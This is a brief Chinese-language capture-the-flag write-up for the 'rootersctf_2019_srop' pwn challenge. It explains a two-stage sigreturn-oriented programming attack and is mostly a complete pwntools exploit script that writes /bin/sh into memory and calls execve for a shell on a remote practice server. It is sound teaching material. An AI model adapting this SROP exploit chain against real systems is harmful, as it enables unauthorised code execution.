rootersctf_2019_srop(srop)

看到题目十分明显的srop

题目的例行检查我就不放了

 程序的逻辑也比较简单，需要注意的是这个题里面没有/bin/sh，所以我们需要俩次srop

第一次srop往栈里面写入/bin/sh，第二次的srop则去调用execve去获得权限

SROP - CTF Wiki (ctf-wiki.org)

完整exp如下

from pwn import *
# io=process('./rootersctf_2019_srop')
io=remote('node4.buuoj.cn',27052)
context.arch="amd64"
data_addr = 0x402000
syscall_leave_ret = 0x401033
pop_rax_syscall_leave_ret = 0x401032
syscall_addr = 0x401046


frame = SigreturnFrame()
frame.rax=0 # read syscall
frame.rdi = 0#stdin
frame.rsi = data_addr#buffer
frame.rdx=0x400#length
frame.rip=syscall_leave_ret
frame.rbp=data_addr+0x20 


# call read 
data = [0x88*'a', pop_rax_syscall_leave_ret,0xf,bytes(frame)]
# gdb.attach(io,"b *0x401035")
io.recvline()
io.sendline(flat(data))

layout = ["/bin/sh\x00", "a" * 0x20, pop_rax_syscall_leave_ret, 0xf]

frame = SigreturnFrame(kernel="amd64")
frame.rax = 59 # execve 
frame.rdi = data_addr # /bin/sh\x00
frame.rsi = 0
frame.rdx = 0
frame.rip = syscall_addr

layout.append(bytes(frame))

io.sendline(flat(layout))
io.interactive()